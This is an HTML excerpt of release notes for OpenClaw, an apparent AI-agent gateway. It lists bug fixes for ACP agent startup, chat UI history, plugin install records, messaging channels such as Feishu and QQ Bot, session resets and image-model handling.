<li>ACPX: stop probing ACP agents during normal Gateway startup; the embedded backend now registers without spawning Codex/ACP child processes unless <code>OPENCLAW_ACPX_RUNTIME_STARTUP_PROBE=1</code> is explicitly set.</li>
<li>CLI/image edit: accept <code>--size</code>, <code>--aspect-ratio</code>, and <code>--resolution</code> on <code>openclaw infer image edit</code> and report all supported edit flags from <code>capability inspect image.edit</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pinghuachiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pinghuachiu">@Pinghuachiu</a>.</li>
<li>ACP: wait for the configured runtime backend to become healthy before startup identity reconciliation, avoiding transient acpx warnings during Gateway boot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043233380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40566" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40566/hovercard" href="https://github.com/openclaw/openclaw/issues/40566">#40566</a>.</li>
<li>Channels/ACP bindings: time out configured binding readiness checks instead of letting Discord preflight hang forever when an ACP target never settles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289732408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68776/hovercard" href="https://github.com/openclaw/openclaw/issues/68776">#68776</a>.</li>
<li>Control UI: hide the chat loading skeleton during background history reloads when existing messages or active stream content are already visible, avoiding reload flashes on high-latency local gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329620242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71844" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71844/hovercard" href="https://github.com/openclaw/openclaw/issues/71844">#71844</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep locally optimistic chat messages visible when a history reload temporarily returns empty, avoiding lost first-turn messages on high-latency gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329761362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71878/hovercard" href="https://github.com/openclaw/openclaw/issues/71878">#71878</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep chat history limits based on visible messages after filtering heartbeat and control-only transcript rows, so recent hidden entries no longer make older visible replies disappear. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/images: scrub old <code>[media attached: ...]</code>, <code>[Image: source: ...]</code>, and <code>media://inbound/...</code> markers from pruned model replay context so stale media refs are not rehydrated as fresh prompt images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329723266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71868/hovercard" href="https://github.com/openclaw/openclaw/issues/71868">#71868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmeadlock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmeadlock">@jmeadlock</a>.</li>
<li>Docker/Bonjour: disable Bonjour/mDNS advertising by default for bundled Compose gateways on bridge networking, while keeping host/macvlan opt-in with <code>OPENCLAW_DISABLE_BONJOUR=0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71879/hovercard" href="https://github.com/openclaw/openclaw/issues/71879">#71879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gbballpack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gbballpack">@gbballpack</a>.</li>
<li>CLI/status: label the OpenClaw Serve/Funnel setting as <code>Tailscale exposure</code> and show daemon state separately when available, so <code>gateway.tailscale.mode: "off"</code> no longer reads like the Tailscale daemon is stopped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329371669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71790" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71790/hovercard" href="https://github.com/openclaw/openclaw/issues/71790">#71790</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pesvobodak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pesvobodak">@pesvobodak</a>.</li>
<li>Plugins/Bonjour: stop ciao mDNS watchdog failures from looping forever when the advertiser stays stuck in <code>probing</code> or <code>announcing</code>; Bonjour now disables itself for the current Gateway process after repeated failed restarts while the Gateway keeps running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291316152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69011/hovercard" href="https://github.com/openclaw/openclaw/issues/69011">#69011</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siddharthaagarwalofficial-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siddharthaagarwalofficial-ux">@siddharthaagarwalofficial-ux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spikefcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spikefcz">@spikefcz</a>.</li>
<li>Gateway/Fly.io: seed Control UI allowed origins from the actual runtime bind and port so CLI-driven non-loopback starts do not crash before config exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329508985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71823/hovercard" href="https://github.com/openclaw/openclaw/issues/71823">#71823</a>.</li>
<li>macOS/remote SSH: keep discovered gateway hosts in <code>gateway.remote.sshTarget</code> while pinning SSH transport URLs to the local loopback tunnel, so browser automation does not regress into blocked non-loopback <code>ws://</code> endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270922535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67336/hovercard" href="https://github.com/openclaw/openclaw/issues/67336">#67336</a>.</li>
<li>Gateway/proxy: bootstrap env proxy dispatching from direct Gateway startup so provider and plugin network requests honor <code>HTTPS_PROXY</code>/<code>HTTP_PROXY</code> before the first embedded agent attempt runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329545167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71833/hovercard" href="https://github.com/openclaw/openclaw/pull/71833">#71833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Plugins/runtime deps: verify clean npm installs actually place requested bundled runtime packages in the managed install root, reporting exact missing specs instead of a false successful repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Plugins/discovery: ignore stale <code>plugins.load.paths</code> aliases that point back at packaged bundled plugin directories and have doctor remove them, keeping bundled plugins on the runtime-deps staging path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Models/LM Studio: preserve <code>@iq*</code> quant suffixes in model refs and provider matching so <code>/model lmstudio/...@iq3_xxs</code> keeps the exact LM Studio variant. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327545635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71474/hovercard" href="https://github.com/openclaw/openclaw/issues/71474">#71474</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327608782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71486/hovercard" href="https://github.com/openclaw/openclaw/pull/71486">#71486</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XinwuC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XinwuC">@XinwuC</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Matrix/cron: preserve the live Matrix delivery target when creating implicit announce reminder jobs so mixed-case room IDs are not reconstructed from lowercased session keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329391998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71798/hovercard" href="https://github.com/openclaw/openclaw/issues/71798">#71798</a>.</li>
<li>Feishu: accept Schema 2.0 card action callbacks that report <code>context.open_chat_id</code> instead of legacy <code>context.chat_id</code>, so button callbacks no longer drop as malformed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328732574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71670/hovercard" href="https://github.com/openclaw/openclaw/issues/71670">#71670</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Feishu: keep synthetic card-action and bot-menu ids out of platform reply targets, using the real card callback message id when Feishu provides one and plain-sending otherwise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328744083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71673/hovercard" href="https://github.com/openclaw/openclaw/issues/71673">#71673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Plugins/QQ Bot: prefer an installed QQ Bot plugin that declares it replaces the bundled <code>qqbot</code> channel, preventing duplicate <code>qqbot_channel_api</code> and <code>qqbot_remind</code> tool registration noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223849801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63102" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63102/hovercard" href="https://github.com/openclaw/openclaw/issues/63102">#63102</a>.</li>
<li>Browser automation: keep stable tab ids and labels attached when Chromium replaces the raw target after form submissions or other action-triggered navigations, and return the replacement <code>targetId</code> from <code>/act</code> when the match is provable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075792997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46137/hovercard" href="https://github.com/openclaw/openclaw/issues/46137">#46137</a>.</li>
<li>QQ Bot: make <code>qqbot_remind</code> schedule, list, and remove Gateway cron jobs directly for owner-authorized senders instead of returning <code>cronParams</code> and relying on a follow-up generic <code>cron</code> tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319867451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70865/hovercard" href="https://github.com/openclaw/openclaw/issues/70865">#70865</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320478556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70937" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70937/hovercard" href="https://github.com/openclaw/openclaw/pull/70937">#70937</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GaosCode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GaosCode">@GaosCode</a>.</li>
<li>Agents/ACP: hide <code>sessions_spawn</code> ACP runtime options unless an ACP backend is loaded, and make <code>/acp doctor</code> call out <code>plugins.allow</code> blocking bundled <code>acpx</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: keep ACP prompt/skill routing hidden unless an ACP runtime backend is available, and warn in doctor when enabled Codex plugin configs still route <code>openai-codex/*</code> models through PI. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Media delivery: avoid sending generated image attachments twice when the assistant reply already includes explicit <code>MEDIA:</code> lines for the same turn, and reject unsafe remote <code>MEDIA:</code> URLs before delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Codex harness: ignore retryable app-server error notifications after Codex recovers, and preserve the real nested error message for terminal app-server failures instead of replacing it with a generic failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/Codex: prepare native Codex sub-agent session metadata without a nested Gateway session patch and add a focused Docker smoke for the app-server sub-agent path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/subagents: keep queued subagent announces session-only when the requester has no external channel target, avoiding ambiguous multi-channel delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189037839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59201/hovercard" href="https://github.com/openclaw/openclaw/issues/59201">#59201</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/larrylhollan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/larrylhollan">@larrylhollan</a>.</li>
<li>Image understanding: preserve configured provider-prefixed vision model metadata when callers request the model without the provider prefix, so custom image models keep their <code>input: ["text", "image"]</code> capability. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4017340728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33185/hovercard" href="https://github.com/openclaw/openclaw/issues/33185">#33185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobe9312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobe9312">@Kobe9312</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: restore the previous plugin index records if a concurrent config write conflict interrupts install, update, or uninstall metadata commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: reject native plugin archives that do not include a valid <code>openclaw.plugin.json</code>, preventing manifestless archives from writing install records that later show missing-manifest diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: remove tracked managed plugin install directories even when the persisted install path differs from the default id-derived target, while still refusing deletes outside the managed extensions root. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/update: restore previous plugin index records if core update or channel setup hits a concurrent config write conflict after plugin metadata changes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/onboarding: defer channel/provider plugin install records until the owning config write commits, keeping setup failures from advancing the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: route configure and agent setup writes with pending plugin install records through the plugin index commit helper so provider onboarding metadata is not stripped by plain config writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: merge pending channel plugin install records with the existing plugin index before config writes, preserving unrelated tracked installs during channel setup, resolve, remove, and capability repair flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: defer shipped <code>plugins.installs</code> index migration during config writes until the guarded config commit window and roll it back if the config write fails before commit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions: keep embedded runtime context out of the visible user prompt by sending it as a hidden next-turn custom message, and teach doctor to repair affected 2026.4.24 transcripts with duplicated prompt-rewrite branches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329177517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71761" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71761/hovercard" href="https://github.com/openclaw/openclaw/issues/71761">#71761</a>.</li>
<li>Gateway/subagents: keep direct-loopback backend RPCs authenticated with the shared gateway token/password off stale CLI paired-device scope baselines, so internal calls no longer hit <code>scope-upgrade</code> pairing prompts while remote, browser, node, device-token, and explicit-device paths still require normal pairing approval. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229478808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63548" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63548/hovercard" href="https://github.com/openclaw/openclaw/issues/63548">#63548</a>.</li>
<li>Providers/Azure OpenAI: give deployment-scoped image generation requests a longer 600s default timeout so slow <code>gpt-image-2</code> generations can complete without a per-call <code>timeoutMs</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328916892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71705/hovercard" href="https://github.com/openclaw/openclaw/issues/71705">#71705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voytas75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voytas75">@voytas75</a>.</li>
<li>Gateway/plugins: link source-checkout bundled runtime dependency caches instead of recursively copying <code>node_modules</code> on the gateway main thread, preventing local status, node, and skill probes from timing out during startup cache restores.</li>
<li>Skills/remote nodes: only expose remote macOS skill bins for connected nodes, clear stale bin matches when node probes fail, and include probe command, timeout, bin count, and connection state in timeout logs.</li>
<li>Skills/remote nodes: recognize <code>system.which</code> object-map responses when probing connected macOS nodes, so Linux gateways can expose macOS-only skills such as Apple Notes when the required binaries are installed remotely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329760105" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71877/hovercard" href="https://github.com/openclaw/openclaw/issues/71877">#71877</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/miguelarios/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/miguelarios">@miguelarios</a>.</li>
<li>CLI/gateway: keep diagnostic probes from creating first-time read-only device pairings, while still reusing cached device tokens for detailed read probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329202027" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71766/hovercard" href="https://github.com/openclaw/openclaw/issues/71766">#71766</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SunboZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SunboZ">@SunboZ</a>.</li>
<li>CLI/plugins: keep <code>message</code> startup, <code>channels logs</code>, <code>agents delete</code>, and <code>agents set-identity</code> off broad plugin preloading; message delivery still loads plugins when the action actually runs.</li>
<li>Image understanding: resolve configured image models such as local LM Studio vision entries before reporting <code>Unknown model</code> when the discovery registry has not registered that provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261396872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66486/hovercard" href="https://github.com/openclaw/openclaw/issues/66486">#66486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>QQ Bot: ignore self-echoed bot messages using the outbound ref-index marker, preventing mirrored replies from re-entering the agent loop while still allowing users to quote bot replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329883097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71912/hovercard" href="https://github.com/openclaw/openclaw/issues/71912">#71912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangyc6003/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangyc6003">@wangyc6003</a>.</li>
<li>Sessions: separate reset freshness from session-store <code>updatedAt</code>, so heartbeat, cron, exec, and gateway bookkeeping no longer prevent configured daily/idle resets from rolling long-running channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285740424" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68315/hovercard" href="https://github.com/openclaw/openclaw/issues/68315">#68315</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232177002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63732/hovercard" href="https://github.com/openclaw/openclaw/issues/63732">#63732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233422936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63820/hovercard" href="https://github.com/openclaw/openclaw/issues/63820">#63820</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291872905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69083" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69083/hovercard" href="https://github.com/openclaw/openclaw/issues/69083">#69083</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxatv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxatv">@maxatv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longhairedsi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longhairedsi">@longhairedsi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradfreels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradfreels">@bradfreels</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akessel56/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akessel56">@akessel56</a>.</li>
<li>Sessions: clear queued system-event notices during <code>/new</code>, <code>/reset</code>, gateway <code>sessions.reset</code>, and daily/idle rollover so stale background updates cannot leak into the first prompt of the fresh session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265262942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66864/hovercard" href="https://github.com/openclaw/openclaw/issues/66864">#66864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/opeyio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/opeyio">@opeyio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cedillarack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cedillarack">@cedillarack</a>.</li>
<li>CLI/agents: keep <code>agents bind</code>, <code>agents unbind</code>, and <code>agents bindings</code> on setup-safe channel metadata paths so they do not preload bundled plugin runtimes or stage runtime dependencies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329103021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71743" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71743/hovercard" href="https://github.com/openclaw/openclaw/issues/71743">#71743</a>.</li>
<li>Plugins/registry: preserve explicit disabled plugin records during registry migration without persisting every unused bundled plugin discovered on disk. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Windows/native: keep CLI startup and bundled provider plugin loading off Windows ESM raw-path failure paths, fixing native onboarding/install smoke on Node 24.</li>
